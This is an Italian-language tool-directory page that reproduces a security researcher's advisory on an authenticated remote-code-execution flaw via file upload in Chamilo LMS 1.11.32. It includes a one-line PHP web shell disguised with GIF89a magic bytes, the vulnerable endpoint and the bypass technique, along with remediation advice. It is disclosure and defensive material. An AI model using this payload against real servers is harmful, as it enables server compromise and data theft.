Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-29041 — Ciao, sono K, questa è la mia prima CVE, che è una vulnerabilità di Remote Code Execution (RCE). È l'inizio del mio percorso come ricercatore di sicurezza. | Kitploit
Strumenti/GitHubGitHub/kx00007/cve-2026-29041
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPaper e RicercaApprendimento e Formazione
GitHubkx00007/cve-2026-29041

CVE-2026-29041

Ciao, sono K, questa è la mia prima CVE, che è una vulnerabilità di Remote Code Execution (RCE). È l'inizio del mio percorso come ricercatore di sicurezza.

Vedi Repository
25 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-29041 — RCE autenticata tramite upload di file senza restrizioni in Chamilo LMS 1.11.32

Esecuzione di codice remota autenticata in Chamilo LMS 1.11.32 tramite una validazione impropria dell'upload di file nell'endpoint AJAX ck_uploadimage. Uno studente con privilegi bassi può caricare una web shell PHP camuffata da immagine, ottenendo il pieno compromesso del server.


📋 Riepilogo della vulnerabilità

CampoDettagli
ProdottoChamilo LMS
Versione1.11.32 (Confermata)
VulnerabilitàUpload di file senza restrizioni con tipo pericoloso (CWE-434)
ImpattoEsecuzione di codice remota autenticata (RCE)
CVSS v3.18.8 (ALTO) — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Autenticazione richiesta✅ Sì — Ruolo studente (privilegi bassi)
CWECWE-434: Upload senza restrizioni di file con tipo pericoloso
Scoperto daMENG HOKSENG

🧠 Dettagli della vulnerabilità

Endpoint interessato

root@kitploit:~
POST /main/inc/ajax/document.ajax.php?a=ck_uploadimage&cidReq=[COURSE_ID]

File vulnerabile: main/inc/ajax/document.ajax.php
Funzione vulnerabile: ck_uploadimage

Analisi della causa principale

Il gestore dell'upload esegue solo la validazione del tipo MIME utilizzando la funzione PHP mime_content_type(), che ispeziona i byte magici del file (i primi byte del contenuto), non l'estensione del file.

root@kitploit:~
// Logica di validazione vulnerabile (semplificata)
$mime = mime_content_type($_FILES['upload']['tmp_name']);

if (!mimeAccepted($mime, ['image'])) {
    die("Invalid file type");
}

// ❌ Nessuna validazione dell'estensione
// ❌ Nessuna sanificazione del nome file
move_uploaded_file($_FILES['upload']['tmp_name'], $uploadPath . $fileUploadName);

Due debolezze separate si combinano in una catena di sfruttamento completa:

  1. Solo validazione del tipo MIME — aggirata anteponendo byte magici validi di un'immagine (GIF89a) al codice PHP
  2. Nome file originale preservato — il server salva il file utilizzando il nome file controllato dall'attaccante, inclusa l'estensione .php, in una directory accessibile via web

Tecnica di bypass

Un file dannoso viene creato come segue:

root@kitploit:~
GIF89a;<?php system($_GET['cmd']); ?>
  • mime_content_type() legge GIF89a → lo classifica come image/gif → supera la validazione
  • move_uploaded_file() lo salva come shell.php in /app/upload/users/<id>/ → direttamente eseguibile tramite browser

💣 Proof of Concept

Esegui l'exploit completo che effettua il login come studente per eseguire automaticamente l'upload del file image Dopo aver eseguito l'exploit Python completo, possiamo trovare la nostra web shell caricata all'indirizzo http://localhost:8081/app/upload/users/3/3/my_fileszhxoxgwj.php?cmd=id image

🛡️ Impatto

Lo sfruttamento riuscito di questa vulnerabilità comporta il pieno compromesso del server a partire da un account di livello studente:

  • 🔴 Esecuzione di codice remoto — comandi OS arbitrari tramite web shell
  • 🔴 Esfiltrazione di dati — accesso completo alle credenziali del database dell'applicazione e ai file
  • 🔴 Movimento laterale — pivot verso la rete interna dal server compromesso
  • 🔴 Persistenza — possibilità di installare backdoor in directory accessibili via web
  • 🔴 Interruzione del servizio — modifica o cancellazione di contenuti dei corsi e dati utente

Impatto CIA: Perdita completa di Riservatezza, Integrità e Disponibilità.


🔧 Rimedio

▪ Applicare una lista bianca rigorosa delle estensioni dei file Devono essere accettate solo le estensioni di file immagine esplicitamente consentite (ad es. .jpg, .png, .gif). I file caricati con estensioni eseguibili come .php, .phtml o .phar devono essere rifiutati indipendentemente dal tipo MIME.

▪ Non affidarsi esclusivamente alla validazione del tipo MIME I controlli del tipo MIME che utilizzano funzioni come mime_content_type() non devono essere usati come controllo di sicurezza primario, poiché possono essere aggirati utilizzando header di file appositamente costruiti. La validazione MIME dovrebbe essere utilizzata solo come controllo secondario.

▪ Archiviare i file caricati al di fuori delle directory accessibili via web Il contenuto caricato deve essere archiviato in una directory non direttamente accessibile tramite il server web. Se è richiesto l'accesso pubblico, i file devono essere serviti tramite un gestore controllato piuttosto che con accesso diretto.

📄 Riferimenti

  • Sito ufficiale di Chamilo LMS
  • CWE-434: Upload senza restrizioni di file con tipo pericoloso
  • OWASP: Upload di file senza restrizioni
  • Calcolatore CVSS v3.1

👤 Autore

MENG HOKSENG
Ricercatore di sicurezza indipendente


⚠️ Disclaimer legale

Questo progetto è rilasciato esclusivamente per scopi educativi e di ricerca sulla sicurezza autorizzata. L'autore non è responsabile di qualsiasi uso improprio o danno causato da questo exploit. Ottenere sempre un'autorizzazione scritta esplicita prima di eseguire valutazioni di sicurezza.

Scarica lo strumento